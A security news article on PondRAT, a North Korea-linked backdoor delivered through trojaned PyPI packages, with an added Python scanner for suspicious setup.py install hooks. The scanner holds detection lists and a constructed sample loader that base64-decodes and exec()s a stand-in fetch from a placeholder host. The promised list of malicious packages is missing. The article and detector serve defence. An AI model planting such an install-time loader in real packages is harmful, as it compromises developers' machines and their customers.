
PondRAT malware in Python packages is a new threat to software developers


Threat actors with North Korean ties have been detected using compromised Python packages to deliver a newly discovered malware called PondRAT, as part of an ongoing cyber campaign.

According to recent findings by Palo Alto Networks’ Unit 42, PondRAT appears to be a lighter variant of POOLRAT (also known as SIMPLESEA), a macOS backdoor previously linked to the Lazarus Group and used in the 3CX supply chain attack last year.

This activity is part of Operation Dream Job, a long-running campaign where victims are enticed with fake job offers to trick them into downloading malicious software.

“The attackers uploaded multiple infected Python packages to PyPI, a well-known repository for open-source Python code,” stated Yoav Zemah, a Unit 42 researcher, who attributed the activity to the Gleaming Pisces threat actor with moderate confidence.

The adversary, also tracked by the cybersecurity community under names such as Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736 (a Lazarus Group sub-cluster), is also notorious for distributing AppleJeus malware.

The goal of these attacks is likely to secure access to supply chain vendors through developers’ systems and ultimately infiltrate the endpoints of those vendors’ customers, as seen in previous incidents.

The list of malicious packages—since removed from PyPI—includes:

The infection chain is simple: installing one of these packages executes an encoded next-stage payload, which fetches the Linux or macOS build of the RAT from a remote server.
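As an added example (not code from the original article or from Unit 42), the following Python script statically triages a package's setup.py for the install-time pattern just described: a setuptools install hook that decodes a large embedded blob and executes it, or setup code that reaches the network or spawns a process while pip runs. The two setup.py sources it scans are constructed for this example; the package name and the URL inside the stand-in payload are placeholders. It is meant to be run against a source distribution fetched with `pip download --no-deps --no-binary :all: <package>` before anything is installed.

```python
"""Static triage of a setup.py for install-time execution of an encoded payload.

Added example, not Unit 42 tooling. Both sample setup.py sources below are
constructed for this example; names and URLs in them are placeholders.
"""
import ast
import base64

EXEC_FUNCS = {"exec", "eval"}
# Calls that turn an embedded blob back into code.
DECODERS = {"b64decode", "b32decode", "b85decode", "a85decode", "fromhex", "unhexlify", "decompress"}
# Modules whose use in setup.py means the package talks to the network or spawns a process at install time.
NET_OR_PROC_MODULES = {"urllib", "requests", "socket", "http", "subprocess"}
OS_PROC_FUNCS = {"system", "popen", "execv", "execvp", "execve", "spawnl", "spawnlp", "startfile"}
# setuptools command classes a package can subclass so its run() executes during `pip install`.
HOOK_CLASSES = {"install", "develop", "build_py", "egg_info"}
MIN_BLOB_LEN = 64  # a str/bytes literal this long inside setup.py deserves a look


def _call_name(call: ast.Call) -> str:
    """'b64decode' for base64.b64decode(...), 'exec' for exec(...)."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def _root_name(node: ast.AST) -> str:
    """'urllib' for urllib.request.urlopen, 'os' for os.system, '' if not a dotted name."""
    while isinstance(node, ast.Attribute):
        node = node.value
    return node.id if isinstance(node, ast.Name) else ""


def _is_blob(node: ast.AST) -> bool:
    return isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)) and len(node.value) >= MIN_BLOB_LEN


def scan_setup_source(src: str) -> list:
    """Return human-readable findings for one setup.py source; an empty list means nothing was flagged."""
    tree = ast.parse(src)
    findings = []
    blob_names = set()   # module-level names bound to large literals (where encoded payloads usually live)
    risky_names = set()  # names imported directly from network/process modules
    for node in tree.body:
        if isinstance(node, ast.Assign) and _is_blob(node.value):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    blob_names.add(target.id)
                    findings.append(f"line {node.lineno}: {target.id} is a {len(node.value.value)}-char literal blob")
        elif isinstance(node, ast.ImportFrom) and node.module:
            top = node.module.split(".")[0]
            for alias in node.names:
                if top in NET_OR_PROC_MODULES or (top == "os" and alias.name in OS_PROC_FUNCS):
                    risky_names.add(alias.asname or alias.name)
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = base.id if isinstance(base, ast.Name) else getattr(base, "attr", "")
                if base_name in HOOK_CLASSES:
                    findings.append(f"line {node.lineno}: class {node.name} overrides setuptools '{base_name}', "
                                    "so its run() executes during pip install")
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in EXEC_FUNCS:
                inner = [n for n in ast.walk(node) if n is not node]
                decoded = any(isinstance(n, ast.Call) and _call_name(n) in DECODERS for n in inner)
                from_blob = any(_is_blob(n) or (isinstance(n, ast.Name) and n.id in blob_names) for n in inner)
                what = ("decoded " if decoded else "") + ("blob data" if from_blob else "data")
                tag = " (encoded next-stage loader pattern)" if decoded or from_blob else ""
                findings.append(f"line {node.lineno}: {name}() over {what}{tag}")
            else:
                root = _root_name(node.func)
                if (root in NET_OR_PROC_MODULES or (root == "os" and name in OS_PROC_FUNCS)
                        or (isinstance(node.func, ast.Name) and name in risky_names)):
                    findings.append(f"line {node.lineno}: {ast.unparse(node.func)}() reaches the network "
                                    "or spawns a process at install time")
    return findings


# Constructed stand-in for a second-stage fetcher; the domain is a reserved .invalid name.
_STAGE_TWO_STANDIN = b"import urllib.request\nurllib.request.urlopen('http://example.invalid/stage2')"

# Constructed sample: install hook that base64-decodes an embedded blob and exec()s it.
MALICIOUS_SETUP = '''
import base64
from setuptools import setup
from setuptools.command.install import install

PAYLOAD = "__BLOB__"

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode(PAYLOAD))

setup(name="example-pkg", version="0.1", cmdclass={"install": PostInstall})
'''.replace("__BLOB__", base64.b64encode(_STAGE_TWO_STANDIN).decode())

# Constructed sample: an ordinary setup.py that should produce no findings.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="example-pkg", version="0.1", packages=["example_pkg"])
'''

if __name__ == "__main__":
    for label, src in (("malicious sample", MALICIOUS_SETUP), ("benign sample", BENIGN_SETUP)):
        print(f"== {label}")
        for finding in scan_setup_source(src) or ["nothing flagged"]:
            print("  ", finding)
```

This is triage, not proof: a clean scan of setup.py says nothing about code in the package's own modules, which runs on first import rather than at install, and wheels carry no setup.py at all, so the same review should cover `__init__.py` and anything it imports. Pinning dependencies with `pip install --require-hashes` keeps a later, trojaned release of the same name from being pulled in unreviewed.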

Python Packages Target Software Developers

Further investigation into PondRAT has uncovered notable similarities with both POOLRAT and AppleJeus, with the attacks also distributing new Linux versions of POOLRAT.

“The Linux and macOS variants of POOLRAT share an identical function structure for loading configurations, with nearly identical method names and functionalities,” Zemah explained.

He also noted that “the method names between the two versions are strikingly similar, and their strings are almost identical. Additionally, the command-handling mechanism from the command-and-control server is nearly the same.”

PondRAT, a streamlined version of POOLRAT, includes features to upload and download files, pause operations for a set time, and execute arbitrary commands.

Unit 42 further stated that “the discovery of additional Linux variants of POOLRAT indicates that Gleaming Pisces has been expanding its capabilities across both Linux and macOS platforms.”

Legitimate-looking Python packages that carry payloads for more than one operating system are a significant threat to organizations: a single install on a developer workstation runs the attacker's code with that developer's privileges and access, and the resulting foothold can be used to spread across the network.

This disclosure comes alongside news from KnowBe4, which revealed that a North Korean threat actor had successfully gained employment within the company. More than a dozen other companies have either hired North Korean operatives or have been targeted by fake resumes and applications from North Koreans seeking jobs.

CrowdStrike, tracking this activity under the name Famous Chollima, described it as a “sophisticated, large-scale nation-state operation,” highlighting the serious risk it poses for organizations with remote employees.

Source: TheHackerNews
